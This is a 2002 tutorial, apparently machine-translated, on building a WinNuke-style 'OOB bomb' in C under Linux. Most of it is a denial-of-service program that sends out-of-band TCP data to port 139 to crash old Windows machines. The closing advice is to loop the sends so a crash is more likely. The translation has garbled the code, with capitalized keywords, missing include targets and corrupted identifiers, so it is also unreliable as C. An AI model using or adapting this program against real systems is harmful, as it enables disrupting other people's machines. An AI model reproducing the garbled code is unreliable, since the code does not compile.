Two years ago, the article took over the facade.
------------------
Production of OOB bombs under Linux
(Author: mikespook | Published: 2002-12-8 | Views: 466)
Keywords: Linux, OOB bomb, online programming: This article is just a guideline that is just a rookie like me. If you are a master, or is not interested in programming. Please don't waste time here. Remember or on the high school, I first contacted the WinNuck Blue Screen Bomb. At that time I felt very mysterious. Later, I realized that the so-called blue screen bomb was OOB bomb at that time. Let us first let us know what is an OOB bomb. OOB bomb, as the name refers to send an OOB message to the other party, causing an abnormal error due to the operating system vulnerability (usually the blue screen, take a blue screen bomb). Of course, the operating system here refers to Windows. The following is a combination of strength to introduce a method of preparing an OOB bomb. I didn't test this procedure, there are many reasons. Mainly there is no condition. I also don't guarantee that this is a version that can be used, because I understand that MS has already repaired this vulnerability. This article today is commemorating! Let everyone know, the original bomb is just this (although this is said, but it is still a high person who can write a good bomb, such as the recent SYN FLOOD. / *------------------------------OOOB_Bomb.c--------------- ------------------- * // * gcc -o -o tcpscan scan.c * /// * Oob Bomb * /// * mikespook * // * 2002.5. 21 * / # include
#include
#include
#include
#include
/ * This function is used to check the input parameters is the IP address or host name * /
INT CORRECTHOST (Const Char * Host, Struct SockAddr_in * Sock);
Main (int Argc, Int * argv [])
{
/ * The port you want to attack, the general OOB bomb default is 139 port * /
INT N_PORT;
/ * Socket socket * /
INT SOCK_ID;
/ * Return error code * /
INT RTN_ERR;
/ * Socket structure, establish a connection, send the message, rely on it * /
Struct SockAddr_in Remote_sock;
/ * Message * /
CHAR * PC_MSG;
/ * Processing command line parameters * /
IF (argc! = 4) {
IF (argc! = 3) {
IF (argc! = 2) {
Printf ("USAGE: OOB_BOMB
[Port] [Message] / N ");
Printf ("Writen By MikesPook / N");
Printf ("MikesPook@hotmail.com/twith subject: Report for Bomb / N");
exit (0);
Else
/ * If there is no input port number, use the default 139 port * /
Remote_sock.sin_port = htons (139);
Else
/ * Otherwise, the input port * /
Remote_sock.sin_port = htons (ATOI (ARGV [2]));
PC_MSG = ":-)";
} else {
Remote_sock.sin_port = htons (ATOI (ARGV [2]));
PC_MSG = (char *) Argv [3];
}
RTN_ERR = CORRECTHOST ((char *) argv [1], (struct sockaddr_in *) & transote_sock); if (RTN_ERR! = 0)
Exit (1);
Remote_sock.sin_family = AF_INET;
/ * Create a Socket socket * /
SOCK_ID = Socket (AF_INET, SOCK_STREAM, 0);
IF (SOCK_ID <0) {
PERROR ("/ nsocket");
EXIT (2);
}
/ * Of course to connect to continue * /
RTN_ERR = Connect (Sock_ID, (Struct SockAddr *) & transote_sock, sizeof (transote_sock);
IF (RTN_ERR <0) {
PERROR ("/ nconnect");
EXIT (3);
}
/ * Oh, send a msg_oob message, "Bomb ..." * /
RTN_ERR = Send (SOCK_ID, PC_MSG, STRLEN (PC_MSG), MSG_OOB);
IF (RTN_ERR == -1) {
PERROR ("/ nsend");
EXIT (4);
}
Printf ("OOB_BOMB SUCCESS! / N");
Close (SOCK_ID);
exit (0);
}
/ * This function I have introduced in the production of the last TCP Connect scanner, not much saying * /
INT CORRECTHOST (Const Char * Host, Struct SockAddr_in * Sock)
{
Struct hostent * struct_host;
IF (Isdigit (* Host))
SOCK-> SIN_ADDR.S_ADDR = INET_ADDR (Host);
Else {
Struct_host = gethostByName (Host);
IF (struct_host! = null)
Bcopy (struct_host-> h_addr, (char *) & SOCK-> SIN_ADDR, STRUCT_HOST-> H_LENGTH);
Else {
Printf ("Get Error with Host Name./N");
Return -1;
}
}
Return 0;
}
-------------------------------------------------- -----------------------------
Finally, I added it. When sending the MSG_oob message, a general OOB bomb will make a loop, a lot of sending the MSG_OOB message to increase the possibility of the other party. The principle I have already said, the improvement is completed by you. :)
Since I am a rookie, maybe there is anything wrong. I may also have some details I have not considered. If you know what you want to advice. The younger brother is grateful! !
